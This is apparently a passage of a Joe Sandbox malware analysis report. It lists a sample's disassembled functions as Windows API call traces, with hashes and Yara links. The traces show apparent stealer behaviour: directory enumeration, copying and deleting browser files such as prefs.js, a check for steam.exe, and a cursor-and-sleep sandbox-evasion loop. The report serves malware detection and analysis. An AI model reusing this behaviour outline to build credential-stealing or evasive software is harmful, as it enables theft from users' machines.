                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                        • String ID: %s\*.*
                                                                                                                                                                        • API String ID: 3967855609-1013718255
                                                                                                                                                                        • Opcode ID: 2c9375e3ace59dc527d45d6153336a27e1305466c71150ccb9ca3c91146dc08d
                                                                                                                                                                        • Instruction ID: 0e61b99e716c997aae1de8279eb171b2eb0d1434b9ea52b41ff9e28cee533809
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c9375e3ace59dc527d45d6153336a27e1305466c71150ccb9ca3c91146dc08d
                                                                                                                                                                        • Instruction Fuzzy Hash: F2D17932D011299BEF22FB24DD46ADD77B4AF59314F4140E1E918B7152DB70AF8A8F81
                                                                                                                                                                        Function 0018D59B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,001B7568,001B6887,?,?,?), ref: 0018D61C
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B756C), ref: 0018D63D
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7570), ref: 0018D657
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,001B7574,?,001B688F), ref: 0018D6E3
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018D7BD
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018D888
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018D92B
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018D93F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                        • String ID: prefs.js
                                                                                                                                                                        • API String ID: 893096357-3783873740
                                                                                                                                                                        • Opcode ID: 94dd6d1bddea8546b12d9c4dcd2320983777fed03358e8764ebc12b0b76107df
                                                                                                                                                                        • Instruction ID: 92dfa5424c2215c648c9f86604de739aea034a4061db0b784bf08e1a234e5b1a
                                                                                                                                                                        • Opcode Fuzzy Hash: 94dd6d1bddea8546b12d9c4dcd2320983777fed03358e8764ebc12b0b76107df
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FA1B632D006289BDF62FB24EC46ADD77B4AF55314F4141E1E908B7291DB74AF8A8F81
                                                                                                                                                                        Function 0018B914 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,001B6826,?,?,?), ref: 0018B970
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7434), ref: 0018B991
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7438), ref: 0018B9AB
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018BDE0
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018BE57
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018BEC6
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018BEDA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 2055012574-1173974218
                                                                                                                                                                        • Opcode ID: cae1397945f495a2b7816b8c673c7e8c72d07033923928b673e73c6d84920856
                                                                                                                                                                        • Instruction ID: 10dee6d13d986b8f50be62ea8280e795e6748905fc9f049e38e5ac332025a789
                                                                                                                                                                        • Opcode Fuzzy Hash: cae1397945f495a2b7816b8c673c7e8c72d07033923928b673e73c6d84920856
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CE17F31900529DBDF22FB24DD46ACDB7B4AF69709F4240E1E51877162DB34AF8A8F80
                                                                                                                                                                        Function 0018B5B4 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,001B741C,001B6822,?,?,?), ref: 0018B62C
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7420), ref: 0018B64D
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7424), ref: 0018B667
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7428,?,001B6823), ref: 0018B6F4
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0018B755
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 0018ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0018AC5F
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018B8C0
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018B8D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3801961486-0
                                                                                                                                                                        • Opcode ID: 3f0b26787d2530ba4a11da699b4900b879a5ba38d655e5e000979fac2f5d72ae
                                                                                                                                                                        • Instruction ID: 6901081a48478e08badedc81b39f74d71cbe2cde0715a796eb26cc9ce052e184
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f0b26787d2530ba4a11da699b4900b879a5ba38d655e5e000979fac2f5d72ae
                                                                                                                                                                        • Instruction Fuzzy Hash: C181F7319046189BCF62FB34EC86ADD77B8AB18304F4501A1FD08A7651EB74AF998F91
                                                                                                                                                                        Function 0019247D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00192487
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001924A9
                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 001924B9
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 001924CB
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 001924DD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001924F6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                        • String ID: steam.exe
                                                                                                                                                                        • API String ID: 1799959500-2826358650
                                                                                                                                                                        • Opcode ID: 5f0b4695876433b87ba42784f6203a9053ccf5ccfd2cf17da02571a0901d38e1
                                                                                                                                                                        • Instruction ID: b4206595db740ac196e0042e28f86117cefb61cd059555db61db5a6ea76d4ef6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f0b4695876433b87ba42784f6203a9053ccf5ccfd2cf17da02571a0901d38e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 3801EC75A01218EBDB61AF64DD49BEE7BBCAB49700F4401A9E40DE71A0DB348A819F51
                                                                                                                                                                        Function 0018180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00181823
                                                                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 0018182A
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 0018183A
                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0018184A
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00181859
                                                                                                                                                                        • Sleep.KERNEL32(00002710), ref: 0018186B
                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00181870
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 0018187F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
